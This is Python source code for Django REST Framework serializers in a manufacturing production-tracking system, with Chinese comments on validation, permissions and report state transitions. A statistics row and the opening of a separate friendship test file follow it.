if attrs['producttask_code'] is not '':
try:
task = ProductTaskCreateModel.objects.get(code=attrs["producttask_code"]) # 判断指定的生产任务是否存在
except Exception as e:
raise serializers.ValidationError("指定的生产任务不存在")
if (task.state != "使用中"): # 判断 状态是否合适
raise serializers.ValidationError("指定的生产任务不在--'使用状态'")
attrs["producttask_name"] = task.name # 获取生产任务名称
attrs["productType_code"] = product.type.code # 获取产品类型编码
attrs["productType_name"] = product.type.name # 获取产品类型名称
attrs["product_code"] = product.code # 获取产品编码
attrs["product_name"] = product.name # 获取产品名称
return attrs
class ProductDailyReportItemSerialize_List(serializers.ModelSerializer):
"""
产品生产日报子项定义--list
"""
image = ProductionImageSerialize_List(many=True)
file = ProductionFileSerialize_List(many=True)
class Meta:
model = ProductDailyReportItemModel
fields = "__all__"
# endregion
# region 产品生产日报定义 序列化器
class ProductDailyReportSerialize_Create(serializers.ModelSerializer):
"""
产品生产日报定义--create
"""
state = serializers.HiddenField(default="新建")
create_user = serializers.HiddenField(default=serializers.CurrentUserDefault())
class Meta:
model = ProductDailyReportModel
fields = ("id", "name", "code", "state", "team", "child","attribute1", "attribute2","attribute3", "attribute4", "attribute5",
"image", "file","dataTime","desc", "auditor", "create_user")
# 所有字段验证
def validate(self, attrs):
if not attrs["create_user"].has_perm('production.add_productdailyreportmodel'): # 如果当前用户没有创建权限
raise serializers.ValidationError("当前用户不具备创建权限'")
if settings.SAME_USER!=True:
if attrs["create_user"].username == attrs["auditor"]: # 审核帐号不能与创建帐号相同
raise serializers.ValidationError("审核帐号不能与创建帐号相同'")
attrs["workshop_code"] = attrs["team"].type.code # 获取车间编码
attrs["workshop_name"] = attrs["team"].type.name # 获取车间名称
return attrs
# 审核者字段验证
def validate_auditor(self, value):
try:
auditor = User.objects.get(username=value)
except Exception as e:
raise serializers.ValidationError("指定的审核账号不存在")
if not auditor.has_perm('production.admin_productdailyreportmodel'):
raise serializers.ValidationError("指定的审核账号不具备审核权限")
return value
# 班组字段验证
def validate_team(self, value):
list = TeamInforDefinitionModel.objects.get(id=value.id)
if list is None: # 判断 父类别是否存在
raise serializers.ValidationError("指定的班组不存在")
elif (list.state != "使用中"): # 判断 父类别状态是否合适
raise serializers.ValidationError("指定的班组不在--'使用状态'")
return value
class ProductDailyReportSerialize_List(serializers.ModelSerializer):
"""
产品生产日报定义--list
"""
team=TeamInforDefinitionSerialize_List(required=False)
class Meta:
model = ProductDailyReportModel
fields = ("id", "name", "code","team","workshop_code","workshop_name", "state", "dataTime",
"auditor", "create_user","create_time","update_time")
class ProductDailyReportSerialize_Retrieve(serializers.ModelSerializer):
"""
产品生产日报定义--retrieve
"""
image = ProductionImageSerialize_List(many=True)
file = ProductionFileSerialize_List(many=True)
alter = ProductionAlterRecordSerialize_List(many=True)
team = TeamInforDefinitionSerialize_List(required=False)
child =ProductDailyReportItemSerialize_List(many=True)
class Meta:
model = ProductDailyReportModel
fields = "__all__"
class ProductDailyReportSerialize_Update(serializers.ModelSerializer):
"""
产品生产日报定义--update
"""
class Meta:
model = ProductDailyReportModel
fields = ("id", "name", "code", "team", "child","attribute1", "attribute2","attribute3", "attribute4", "attribute5", "image",
"file","dataTime","desc", "auditor")
# 所有字段验证
def validate(self, attrs):
if self.instance.state != '新建': # 如果不是新建状态 不能更改信息
raise serializers.ValidationError("当前信息已提交,禁止更改")
return attrs
# 审核者字段验证
def validate_auditor(self, value):
if self.instance.state != '新建': # 如果不是新建状态 该字段不能更改
raise serializers.ValidationError("当前信息已提交,禁止更改")
if settings.SAME_USER != True:
if self.instance.create_user == value: # 审核帐号不能与创建帐号相同
raise serializers.ValidationError("审核帐号不能与创建帐号相同'")
try:
auditor = User.objects.get(username=value)
except Exception as e:
raise serializers.ValidationError("指定的审核账号不存在")
if not auditor.has_perm('production.admin_productdailyreportmodel'):
raise serializers.ValidationError("指定的审核账号不具备审核权限")
return value
# 班组字段验证
def validate_team(self, value):
if self.instance.state != '新建': # 如果不是新建状态 该字段不能更改
raise serializers.ValidationError("当前信息已提交,禁止更改")
list = TeamInforDefinitionModel.objects.get(id=value.id)
if list is None: # 判断 父类别是否存在
raise serializers.ValidationError("指定的班组不存在")
elif (list.state != "使用中"): # 判断 父类别状态是否合适
raise serializers.ValidationError("指定的班组不在--'使用状态'")
return value
class ProductDailyReportSerialize_Partial(serializers.ModelSerializer):
"""
产品生产日报定义--partial
"""
class Meta:
model = ProductDailyReportModel
fields = ("id", "state", "alter")
# 所有字段验证
def validate(self, attrs):
try:
del attrs['alter'] # 删除alter字段
except Exception:
pass
return attrs
# 状态字段验证
def validate_state(self, value):
validate_states1(self.instance.state, value)
if (self.instance.create_user == self.context['request'].user.username) and\
(self.instance.auditor != self.context['request'].user.username): # 如果当前用户为创建账号但不是审核账号
if not (self.instance.state == "新建" and (value == "审核中" or value == "作废")):
raise serializers.ValidationError("创建者只能将[新建]信息更改成[审核中]或[作废]")
return value
# 审核记录字段验证
def validate_alter(self, value):
obj = ProductDailyReportModel.objects.get(id=self.instance.id).alter
for data in value:
obj.add(data.id)
return value
# endregion
# region 半成品生产日报子项定义 序列化器
class SemifinishedDailyReportItemSerialize_Create(serializers.ModelSerializer):
"""
半成品生产日报子项定义--create
"""
create_user = serializers.HiddenField(default=serializers.CurrentUserDefault())
class Meta:
model = SemifinishedDailyReportItemModel
fields = ("id", "handler","producttask_code", "semifinished_id", "all_sum", "ok_sum", "ng_sum",
"attribute1","attribute2","attribute3","attribute4","attribute5","image","file","desc","create_user")
# 所有字段验证
def validate(self, attrs):
try:
semifinished = SemifinishedInforDefinitionModel.objects.get(id=attrs["semifinished_id"]) # 判断指定的半成品是否存在
except Exception as e:
raise serializers.ValidationError("指定的半成品不存在")
if semifinished.state != "使用中":
raise serializers.ValidationError("指定的半成品不在'使用中'状态")
if 'producttask_code' in attrs.keys():
if attrs['producttask_code'] is not '':
try:
task = ProductTaskCreateModel.objects.get(code=attrs["producttask_code"]) # 判断指定的生产任务是否存在
except Exception as e:
raise serializers.ValidationError("指定的生产任务不存在")
if (task.state != "使用中"): # 判断 状态是否合适
raise serializers.ValidationError("指定的生产任务不在--'使用状态'")
attrs["producttask_name"] = task.name # 获取生产任务名称
attrs["semifinishedType_code"] = semifinished.type.code # 获取半成品类型编码
attrs["semifinishedType_name"] = semifinished.type.name # 获取半成品类型名称
attrs["semifinished_code"] = semifinished.code # 获取半成品编码
attrs["semifinished_name"] = semifinished.name # 获取半成品名称
return attrs
class SemifinishedDailyReportItemSerialize_List(serializers.ModelSerializer):
"""
半成品生产日报子项定义--list
"""
image = ProductionImageSerialize_List(many=True)
file = ProductionFileSerialize_List(many=True)
class Meta:
model = SemifinishedDailyReportItemModel
fields = "__all__"
# endregion
# region 半成品生产日报定义 序列化器
class SemifinishedDailyReportSerialize_Create(serializers.ModelSerializer):
"""
半成品生产日报定义--create
"""
state = serializers.HiddenField(default="新建")
create_user = serializers.HiddenField(default=serializers.CurrentUserDefault())
class Meta:
model = SemifinishedDailyReportModel
fields = ("id", "name", "code", "state", "team", "child","attribute1", "attribute2","attribute3", "attribute4", "attribute5",
"image", "file","dataTime","desc", "auditor", "create_user")
# 所有字段验证
def validate(self, attrs):
if not attrs["create_user"].has_perm('production.add_semifinisheddailyreportmodel'): # 如果当前用户没有创建权限
raise serializers.ValidationError("当前用户不具备创建权限'")
if settings.SAME_USER!=True:
if attrs["create_user"].username == attrs["auditor"]: # 审核帐号不能与创建帐号相同
raise serializers.ValidationError("审核帐号不能与创建帐号相同'")
attrs["workshop_code"] = attrs["team"].type.code # 获取车间编码
attrs["workshop_name"] = attrs["team"].type.name # 获取车间名称
return attrs
# 审核者字段验证
def validate_auditor(self, value):
try:
auditor = User.objects.get(username=value)
except Exception as e:
raise serializers.ValidationError("指定的审核账号不存在")
if not auditor.has_perm('production.admin_semifinisheddailyreportmodel'):
raise serializers.ValidationError("指定的审核账号不具备审核权限")
return value
# 班组字段验证
def validate_team(self, value):
list = TeamInforDefinitionModel.objects.get(id=value.id)
if list is None: # 判断 父类别是否存在
raise serializers.ValidationError("指定的班组不存在")
elif (list.state != "使用中"): # 判断 父类别状态是否合适
raise serializers.ValidationError("指定的班组不在--'使用状态'")
return value
class SemifinishedDailyReportSerialize_List(serializers.ModelSerializer):
"""
半成品生产日报定义--list
"""
team=TeamInforDefinitionSerialize_List(required=False)
class Meta:
model = SemifinishedDailyReportModel
fields = ("id", "name", "code","team","workshop_code","workshop_name","state", "dataTime",
"auditor", "create_user","create_time","update_time"
)
class SemifinishedDailyReportSerialize_Retrieve(serializers.ModelSerializer):
"""
半成品生产日报定义--retrieve
"""
image = ProductionImageSerialize_List(many=True)
file = ProductionFileSerialize_List(many=True)
alter = ProductionAlterRecordSerialize_List(many=True)
team = TeamInforDefinitionSerialize_List(required=False)
child = SemifinishedDailyReportItemSerialize_List(many=True)
class Meta:
model = SemifinishedDailyReportModel
fields = "__all__"
class SemifinishedDailyReportSerialize_Update(serializers.ModelSerializer):
"""
半成品生产日报定义--update
"""
class Meta:
model = SemifinishedDailyReportModel
fields = ("id", "name", "code", "team", "child","attribute1", "attribute2","attribute3", "attribute4", "attribute5",
"image", "file","dataTime","desc", "auditor")
# 所有字段验证
def validate(self, attrs):
if self.instance.state != '新建': # 如果不是新建状态 不能更改信息
raise serializers.ValidationError("当前信息已提交,禁止更改")
return attrs
# 审核者字段验证
def validate_auditor(self, value):
if self.instance.state != '新建': # 如果不是新建状态 该字段不能更改
raise serializers.ValidationError("当前信息已提交,禁止更改")
if settings.SAME_USER != True:
if self.instance.create_user == value: # 审核帐号不能与创建帐号相同
raise serializers.ValidationError("审核帐号不能与创建帐号相同'")
try:
auditor = User.objects.get(username=value)
except Exception as e:
raise serializers.ValidationError("指定的审核账号不存在")
if not auditor.has_perm('production.admin_semifinisheddailyreportmodel'):
raise serializers.ValidationError("指定的审核账号不具备审核权限")
return value
# 班组字段验证
def validate_team(self, value):
if self.instance.state != '新建': # 如果不是新建状态 该字段不能更改
raise serializers.ValidationError("当前信息已提交,禁止更改")
list = TeamInforDefinitionModel.objects.get(id=value.id)
if list is None: # 判断 父类别是否存在
raise serializers.ValidationError("指定的班组不存在")
elif (list.state != "使用中"): # 判断 父类别状态是否合适
raise serializers.ValidationError("指定的班组不在--'使用状态'")
return value
class SemifinishedDailyReportSerialize_Partial(serializers.ModelSerializer):
"""
半成品生产日报定义--partial
"""
class Meta:
model = SemifinishedDailyReportModel
fields = ("id", "state", "alter")
# 所有字段验证
def validate(self, attrs):
try:
del attrs['alter'] # 删除alter字段
except Exception:
pass
return attrs
# 状态字段验证
def validate_state(self, value):
validate_states1(self.instance.state, value)
if (self.instance.create_user == self.context['request'].user.username) and\
(self.instance.auditor != self.context['request'].user.username): # 如果当前用户为创建账号但不是审核账号
if not (self.instance.state == "新建" and (value == "审核中" or value == "作废")):
raise serializers.ValidationError("创建者只能将[新建]信息更改成[审核中]或[作废]")
return value
# 审核记录字段验证
def validate_alter(self, value):
obj = SemifinishedDailyReportModel.objects.get(id=self.instance.id).alter
for data in value:
obj.add(data.id)
return value
# endregion
# region 产品过程数据定义 序列化器
class ProductDataSerialize_Create(serializers.ModelSerializer):
"""
产品过程数据定义--create
"""
state = serializers.HiddenField(default="新建")
create_user = serializers.HiddenField(default=serializers.CurrentUserDefault())
class Meta:
model = ProductDataDefinitionModel
fields = ("id","state","type","task_id","product_id","station_id","batch","sn","handler","sum","personnel","equipment","material","station","quality","dataTime",
"attribute1", "attribute2", "attribute3", "attribute4","attribute5","attribute6", "attribute7", "attribute8", "attribute9", "attribute10",
"attribute11", "attribute12", "attribute13", "attribute14", "attribute15","attribute16", "attribute17", "attribute18", "attribute19", "attribute20",
"image", "file","desc", "create_user")
# 所有字段验证
def validate(self, attrs):
if not attrs["create_user"].has_perm('production.add_productdatadefinitionmodel'): # 如果当前用户没有创建权限
raise serializers.ValidationError("当前用户不具备创建权限'")
if 'task_id' in attrs.keys():
if attrs['task_id'] is not '':
try:
task = ProductTaskCreateModel.objects.get(id=attrs["task_id"]) # 判断指定的任务是否存在
except Exception as e:
raise serializers.ValidationError("指定的任务不存在")
if (task.state != "使用中"): # 判断 状态是否合适
raise serializers.ValidationError("指定的生产任务不在--'使用状态'")
attrs["taskType_code"] = task.type.code # 获取任务类型编码
attrs["taskType_name"] = task.type.name # 获取任务类型名称
attrs["task_code"] = task.code # 获取任务编码
attrs["task_name"] = task.name # 获取任务名称
if 'product_id' in attrs.keys():
if attrs['product_id'] is not '':
try:
product = ProductInforDefinitionModel.objects.get(id=attrs["product_id"]) # 判断指定的产品是否存在
except Exception as e:
raise serializers.ValidationError("指定的产品不存在")
if (product.state != "使用中"): # 判断 状态是否合适
raise serializers.ValidationError("指定的产品不在--'使用状态'")
attrs["productType_code"] = product.type.code # 获取产品类型编码
attrs["productType_name"] = product.type.name # 获取产品类型名称
attrs["product_code"] = product.code # 获取产品编码
attrs["product_name"] = product.name # 获取产品名称
if 'station_id' in attrs.keys():
if attrs['station_id'] is not '':
if not 'product_id' in attrs.keys():
raise serializers.ValidationError("未指定产品信息,不能指定工位信息")
else:
if attrs['product_id'] is '':
raise serializers.ValidationError("未指定产品信息,不能指定工位信息")
try:
station = StationInforDefinitionModel.objects.get(id=attrs["station_id"]) # 判断指定的工位是否存在
except Exception as e:
raise serializers.ValidationError("指定的工位不存在")
if (station.state != "使用中"): # 判断 状态是否合适
raise serializers.ValidationError("指定的工位不在--'使用状态'")
attrs["stationType_code"] = station.type.code # 获取工位类型编码
attrs["stationType_name"] = station.type.name # 获取工位类型名称
attrs["station_code"] = station.code # 获取工位编码
attrs["station_name"] = station.name # 获取工位名称
return attrs
# 类型字段验证
def validate_type(self, value):
list = ProductDataTypeDefinitionModel.objects.get(id=value.id)
if list is None: # 判断 父类别是否存在
raise serializers.ValidationError("指定的类型不存在")
elif (list.state != "使用中"): # 判断 父类别状态是否合适
raise serializers.ValidationError("指定的类型不在--'使用状态'")
return value
class ProductDataSerialize_Update(serializers.ModelSerializer):
"""
产品过程数据定义--update
"""
class Meta:
model = ProductDataDefinitionModel
fields = ("id","type","task_id","product_id","station_id","batch","sn","handler","sum","personnel","equipment","material","station","quality","dataTime",
"attribute1", "attribute2", "attribute3", "attribute4","attribute5","attribute6", "attribute7", "attribute8", "attribute9", "attribute10",
"attribute11", "attribute12", "attribute13", "attribute14", "attribute15","attribute16", "attribute17", "attribute18", "attribute19", "attribute20",
"image", "file","desc",)
# 所有字段验证
def validate(self, attrs):
if self.instance.state != '新建': # 如果不是新建状态 不能更改信息
raise serializers.ValidationError("当前信息已提交,禁止更改")
if 'task_id' in attrs.keys():
if attrs['task_id'] is not '':
try:
task = ProductTaskCreateModel.objects.get(id=attrs["task_id"]) # 判断指定的任务是否存在
except Exception as e:
raise serializers.ValidationError("指定的任务不存在")
if (task.state != "使用中"): # 判断 状态是否合适
raise serializers.ValidationError("指定的生产任务不在--'使用状态'")
attrs["taskType_code"] = task.type.code # 获取任务类型编码
attrs["taskType_name"] = task.type.name # 获取任务类型名称
attrs["task_code"] = task.code # 获取任务编码
attrs["task_name"] = task.name # 获取任务名称
if 'product_id' in attrs.keys():
if attrs['product_id'] is not '':
try:
product = ProductInforDefinitionModel.objects.get(id=attrs["product_id"]) # 判断指定的产品是否存在
except Exception as e:
raise serializers.ValidationError("指定的产品不存在")
if (product.state != "使用中"): # 判断 状态是否合适
raise serializers.ValidationError("指定的产品不在--'使用状态'")
attrs["productType_code"] = product.type.code # 获取产品类型编码
attrs["productType_name"] = product.type.name # 获取产品类型名称
attrs["product_code"] = product.code # 获取产品编码
attrs["product_name"] = product.name # 获取产品名称
if 'station_id' in attrs.keys():
if attrs['station_id'] is not '':
if not 'product_id' in attrs.keys():
raise serializers.ValidationError("未指定产品信息,不能指定工位信息")
else:
if attrs['product_id'] is '':
raise serializers.ValidationError("未指定产品信息,不能指定工位信息")
try:
station = StationInforDefinitionModel.objects.get(id=attrs["station_id"]) # 判断指定的工位是否存在
except Exception as e:
raise serializers.ValidationError("指定的工位不存在")
if (station.state != "使用中"): # 判断 状态是否合适
raise serializers.ValidationError("指定的工位不在--'使用状态'")
attrs["stationType_code"] = station.type.code # 获取工位类型编码
attrs["stationType_name"] = station.type.name # 获取工位类型名称
attrs["station_code"] = station.code # 获取工位编码
attrs["station_name"] = station.name # 获取工位名称
return attrs
# 类型字段验证
def validate_type(self, value):
list = ProductDataTypeDefinitionModel.objects.get(id=value.id)
if list is None: # 判断 父类别是否存在
raise serializers.ValidationError("指定的类型不存在")
elif (list.state != "使用中"): # 判断 父类别状态是否合适
raise serializers.ValidationError("指定的类型不在--'使用状态'")
return value
class ProductDataSerialize_List(serializers.ModelSerializer):
"""
产品过程数据定义--list
"""
type = ProductDataTypeDefinitionSerialize_List(required=False)
class Meta:
model = ProductDataDefinitionModel
fields = ("id","state","type",
"taskType_code","taskType_name","task_name","task_code","task_id","productType_code","productType_name","product_name","product_code","product_id",
"stationType_name","stationType_code","station_name","station_code","station_id","batch","handler","sum","sn",
"personnel","equipment","material","station","quality","dataTime","desc", "create_user")
class ProductDataSerialize_Retrieve(serializers.ModelSerializer):
"""
产品过程数据定义--retrieve
"""
image =ProductionImageSerialize_List(many=True)
file =ProductionFileSerialize_List(many=True)
type = ProductDataTypeDefinitionSerialize_List(required=False)
class Meta:
model = ProductDataDefinitionModel
fields = "__all__"
class ProductDataSerialize_Partial(serializers.ModelSerializer):
"""
产品过程数据定义--partial
"""
class Meta:
model = ProductDataDefinitionModel
fields = ("id", "state",)
# 所有字段验证
def validate(self, attrs):
if attrs['state'] == "完成": # 通过提交情况下
condtions1 = {'task_id__iexact': self.instance.task_id,
'product_id__iexact': self.instance.product_id,
'batch__iexact': self.instance.batch,
'station_id__iexact': self.instance.station_id,
}
try:
stationReport = ProductStationReportModel.objects.get(**condtions1) # 获取指定的报工信息
stationReport.sum += self.instance.sum # 更新报工数量
stationReport.save()
except Exception as e:
ProductStationReportModel.objects.create( # 新建一条报工记录
taskType_code=self.instance.taskType_code,
taskType_name=self.instance.taskType_name,
task_code=self.instance.task_code,
task_name=self.instance.task_name,
task_id=self.instance.task_id,
productType_code=self.instance.productType_code,
productType_name=self.instance.productType_name,
product_code=self.instance.product_code,
product_name=self.instance.product_name,
product_id=self.instance.product_id,
stationType_code=self.instance.stationType_code,
stationType_name=self.instance.stationType_name,
station_code=self.instance.station_code,
station_name=self.instance.station_name,
station_id=self.instance.station_id,
batch=self.instance.batch,
sum=self.instance.sum,
attribute1=self.instance.attribute1,
attribute2=self.instance.attribute2,
attribute3=self.instance.attribute3,
attribute4=self.instance.attribute4,
attribute5=self.instance.attribute5,
)
return attrs
# 状态字段验证
def validate_state(self, value):
if (self.instance.state == "新建" and \
(value == "完成" or value == "作废")):
return value
if (self.instance.state == "完成" and \
(value == "作废")):
return value
raise serializers.ValidationError("不能从" + self.instance.state + "更新到" + value)
return value
# endregion
# region 半成品过程数据定义 序列化器
class SemifinishedDataSerialize_Create(serializers.ModelSerializer):
"""
半成品过程数据定义--create
"""
state = serializers.HiddenField(default="新建")
create_user = serializers.HiddenField(default=serializers.CurrentUserDefault())
class Meta:
model = SemifinishedDataDefinitionModel
fields = ("id","state", "type","task_id","semifinished_id","station_id","batch","sn","handler","sum","personnel","equipment","material","station","quality","dataTime",
"attribute1", "attribute2", "attribute3", "attribute4","attribute5","attribute6", "attribute7", "attribute8", "attribute9", "attribute10",
"attribute11", "attribute12", "attribute13", "attribute14", "attribute15","attribute16", "attribute17", "attribute18", "attribute19", "attribute20",
"image", "file","desc", "create_user")
# 所有字段验证
def validate(self, attrs):
if not attrs["create_user"].has_perm('production.add_semifinisheddatadefinitionmodel'): # 如果当前用户没有创建权限
raise serializers.ValidationError("当前用户不具备创建权限'")
if 'task_id' in attrs.keys():
if attrs['task_id'] is not '':
try:
task = SemifinishedTaskCreateModel.objects.get(id=attrs["task_id"]) # 判断指定的任务是否存在
except Exception as e:
raise serializers.ValidationError("指定的任务不存在")
if (task.state != "使用中"): # 判断 状态是否合适
raise serializers.ValidationError("指定的生产任务不在--'使用状态'")
attrs["taskType_code"] = task.type.code # 获取任务类型编码
attrs["taskType_name"] = task.type.name # 获取任务类型名称
attrs["task_code"] = task.code # 获取任务编码
attrs["task_name"] = task.name # 获取任务名称
if 'semifinished_id' in attrs.keys():
if attrs['semifinished_id'] is not '':
try:
semifinished = SemifinishedInforDefinitionModel.objects.get(id=attrs["semifinished_id"]) # 判断指定的半成品是否存在
except Exception as e:
raise serializers.ValidationError("指定的半成品不存在")
if (semifinished.state != "使用中"): # 判断 状态是否合适
raise serializers.ValidationError("指定的半成品不在--'使用状态'")
attrs["semifinishedType_code"] = semifinished.type.code # 获取半成品类型编码
attrs["semifinishedType_name"] = semifinished.type.name # 获取半成品类型名称
attrs["semifinished_code"] = semifinished.code # 获取半成品编码
attrs["semifinished_name"] = semifinished.name # 获取半成品名称
if 'station_id' in attrs.keys():
if attrs['station_id'] is not '':
if not 'semifinished_id' in attrs.keys():
raise serializers.ValidationError("未指定半成品信息,不能指定工位信息")
else:
if attrs['semifinished_id'] is '':
raise serializers.ValidationError("未指定半成品信息,不能指定工位信息")
try:
station = StationInforDefinitionModel.objects.get(id=attrs["station_id"]) # 判断指定的工位是否存在
except Exception as e:
raise serializers.ValidationError("指定的工位不存在")
if (station.state != "使用中"): # 判断 状态是否合适
raise serializers.ValidationError("指定的工位不在--'使用状态'")
attrs["stationType_code"] = station.type.code # 获取工位类型编码
attrs["stationType_name"] = station.type.name # 获取工位类型名称
attrs["station_code"] = station.code # 获取工位编码
attrs["station_name"] = station.name # 获取工位名称
return attrs
# 类型字段验证
def validate_type(self, value):
list = SemifinishedDataTypeDefinitionModel.objects.get(id=value.id)
if list is None: # 判断 父类别是否存在
raise serializers.ValidationError("指定的类型不存在")
elif (list.state != "使用中"): # 判断 父类别状态是否合适
raise serializers.ValidationError("指定的类型不在--'使用状态'")
return value
class SemifinishedDataSerialize_Update(serializers.ModelSerializer):
"""
半成品过程数据定义--update
"""
class Meta:
model = SemifinishedDataDefinitionModel
fields = ("id","type","task_id","semifinished_id","station_id","batch","sn","handler","sum","personnel","equipment","material","station","quality","dataTime",
"attribute1", "attribute2", "attribute3", "attribute4","attribute5","attribute6", "attribute7", "attribute8", "attribute9", "attribute10",
"attribute11", "attribute12", "attribute13", "attribute14", "attribute15","attribute16", "attribute17", "attribute18", "attribute19", "attribute20",
"image", "file","desc",)
# 所有字段验证
def validate(self, attrs):
if self.instance.state != '新建': # 如果不是新建状态 不能更改信息
raise serializers.ValidationError("当前信息已提交,禁止更改")
if 'task_id' in attrs.keys():
if attrs['task_id'] is not '':
try:
task = SemifinishedTaskCreateModel.objects.get(id=attrs["task_id"]) # 判断指定的任务是否存在
except Exception as e:
raise serializers.ValidationError("指定的任务不存在")
if (task.state != "使用中"): # 判断 状态是否合适
raise serializers.ValidationError("指定的生产任务不在--'使用状态'")
attrs["taskType_code"] = task.type.code # 获取任务类型编码
attrs["taskType_name"] = task.type.name # 获取任务类型名称
attrs["task_code"] = task.code # 获取任务编码
attrs["task_name"] = task.name # 获取任务名称
if 'semifinished_id' in attrs.keys():
if attrs['semifinished_id'] is not '':
try:
semifinished = SemifinishedInforDefinitionModel.objects.get(id=attrs["semifinished_id"]) # 判断指定的半成品是否存在
except Exception as e:
raise serializers.ValidationError("指定的半成品不存在")
if (semifinished.state != "使用中"): # 判断 状态是否合适
raise serializers.ValidationError("指定的半成品不在--'使用状态'")
attrs["semifinishedType_code"] = semifinished.type.code # 获取半成品类型编码
attrs["semifinishedType_name"] = semifinished.type.name # 获取半成品类型名称
attrs["semifinished_code"] = semifinished.code # 获取半成品编码
attrs["semifinished_name"] = semifinished.name # 获取半成品名称
if 'station_id' in attrs.keys():
if attrs['station_id'] is not '':
if not 'semifinished_id' in attrs.keys():
raise serializers.ValidationError("未指定半成品信息,不能指定工位信息")
else:
if attrs['semifinished_id'] is '':
raise serializers.ValidationError("未指定半成品信息,不能指定工位信息")
try:
station = StationInforDefinitionModel.objects.get(id=attrs["station_id"]) # 判断指定的工位是否存在
except Exception as e:
raise serializers.ValidationError("指定的工位不存在")
if (station.state != "使用中"): # 判断 状态是否合适
raise serializers.ValidationError("指定的工位不在--'使用状态'")
attrs["stationType_code"] = station.type.code # 获取工位类型编码
attrs["stationType_name"] = station.type.name # 获取工位类型名称
attrs["station_code"] = station.code # 获取工位编码
attrs["station_name"] = station.name # 获取工位名称
return attrs
# 类型字段验证
def validate_type(self, value):
list = SemifinishedDataTypeDefinitionModel.objects.get(id=value.id)
if list is None: # 判断 父类别是否存在
raise serializers.ValidationError("指定的类型不存在")
elif (list.state != "使用中"): # 判断 父类别状态是否合适
raise serializers.ValidationError("指定的类型不在--'使用状态'")
return value
class SemifinishedDataSerialize_List(serializers.ModelSerializer):
"""
半成品过程数据定义--list
"""
type = SemifinishedDataTypeDefinitionSerialize_List(required=False)
class Meta:
model = SemifinishedDataDefinitionModel
fields = ("id","state","type",
"taskType_code","taskType_name","task_name","task_code","task_id","semifinishedType_name","semifinishedType_code","semifinished_name","semifinished_code","semifinished_id",
"stationType_name","stationType_code","station_name","station_code","station_id","batch","handler","sum","sn",
"personnel","equipment","material","station","quality","dataTime","desc", "create_user")
class SemifinishedDataSerialize_Retrieve(serializers.ModelSerializer):
"""
半成品过程数据定义--retrieve
"""
image =ProductionImageSerialize_List(many=True)
file =ProductionFileSerialize_List(many=True)
type = SemifinishedDataTypeDefinitionSerialize_List(required=False)
class Meta:
model = SemifinishedDataDefinitionModel
fields = "__all__"
class SemifinishedDataSerialize_Partial(serializers.ModelSerializer) :
"""
半成品过程数据定义--partial
"""
class Meta :
model = SemifinishedDataDefinitionModel
fields = ("id", "state")
# 所有字段验证
def validate(self, attrs) :
if attrs['state'] == "完成" : # 通过提交情况下
condtions1 = {'task_id__iexact' : self.instance.task_id,
'semifinished_id__iexact' : self.instance.semifinished_id,
'batch__iexact' : self.instance.batch,
'station_id__iexact': self.instance.station_id,
}
try :
stationReport = SemifinishedStationReportModel.objects.get(**condtions1) # 获取指定的报工信息
stationReport.sum += self.instance.sum # 更新报工数量
stationReport.save()
except Exception as e :
SemifinishedStationReportModel.objects.create( # 新建一条报工记录
taskType_code=self.instance.taskType_code,
taskType_name=self.instance.taskType_name,
task_code=self.instance.task_code,
task_name=self.instance.task_name,
task_id=self.instance.task_id,
semifinishedType_code=self.instance.semifinishedType_code,
semifinishedType_name=self.instance.semifinishedType_name,
semifinished_code=self.instance.semifinished_code,
semifinished_name=self.instance.semifinished_name,
semifinished_id=self.instance.semifinished_id,
stationType_code=self.instance.stationType_code,
stationType_name=self.instance.stationType_name,
station_code=self.instance.station_code,
station_name=self.instance.station_name,
station_id=self.instance.station_id,
batch=self.instance.batch,
sum=self.instance.sum,
attribute1=self.instance.attribute1,
attribute2=self.instance.attribute2,
attribute3=self.instance.attribute3,
attribute4=self.instance.attribute4,
attribute5=self.instance.attribute5,
)
return attrs
# 状态字段验证
def validate_state(self, value) :
if (self.instance.state == "新建" and \
(value == "完成" or value == "作废")) :
return value
if (self.instance.state == "完成" and \
(value == "作废")) :
return value
raise serializers.ValidationError("不能从" + self.instance.state + "更新到" + value)
return value
# endregion
class ProductStationReportSerialize_List(serializers.ModelSerializer) :
"""
产品工序报工--list
"""
class Meta :
model = ProductStationReportModel
fields = "__all__"
class SemifinishedStationReportSerialize_List(serializers.ModelSerializer) :
"""
半成品工序报工--list
"""
class Meta :
model = SemifinishedStationReportModel
fields = "__all__" | 43.630709 | 190 | 0.618652 | 4,056 | 44,896 | 6.733974 | 0.066075 | 0.060923 | 0.118039 | 0.015817 | 0.868195 | 0.854392 | 0.842969 | 0.839856 | 0.825761 | 0.814264 | 0 | 0.005819 | 0.268844 | 44,896 | 1,029 | 191 | 43.630709 | 0.826235 | 0.060184 | 0 | 0.862516 | 0 | 0 | 0.166065 | 0.017245 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055772 | false | 0.003891 | 0.010376 | 0 | 0.264591 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
11e8d8e73a2f3aa38f5aebb52da3a5f93862b373 | 2,999 | py | Python | user_accounts/tests/test_friendships.py | sudo-woodo/hitmeup | 45e50b0676d986a7308ba80bf623daa8a588767d | [
"MIT"
] | 1 | 2018-03-28T14:38:35.000Z | 2018-03-28T14:38:35.000Z | user_accounts/tests/test_friendships.py | sudo-woodo/hitmeup | 45e50b0676d986a7308ba80bf623daa8a588767d | [
"MIT"
] | 1 | 2022-02-11T19:13:04.000Z | 2022-02-11T19:13:04.000Z | user_accounts/tests/test_friendships.py | sudo-woodo/hitmeup | 45e50b0676d986a7308ba80bf623daa8a588767d | [
"MIT"
] | 1 | 2018-02-14T06:36:43.000Z | 2018-02-14T06:36:43.000Z | from django.test.testcases import TestCase
from user_accounts.models import Friendship
from util.factories import UserProfileFactory
class FriendshipTestCase(TestCase):
NUM_OTHERS = 5
def setUp(self):
self.profile = UserProfileFactory()
self.other = UserProfileFactory()
def test_add(self):
# Normal add
friendship, created = self.profile.add_friend(self.other)
self.assertFalse(friendship.accepted)
self.assertTrue(created)
self.assertEqual(len(self.profile.friends), 0)
self.assertEqual(len(self.profile.pending_incoming_friends), 0)
self.assertEqual(len(self.profile.pending_outgoing_friends), 1)
self.assertEqual(len(self.other.friends), 0)
self.assertEqual(len(self.other.pending_incoming_friends), 1)
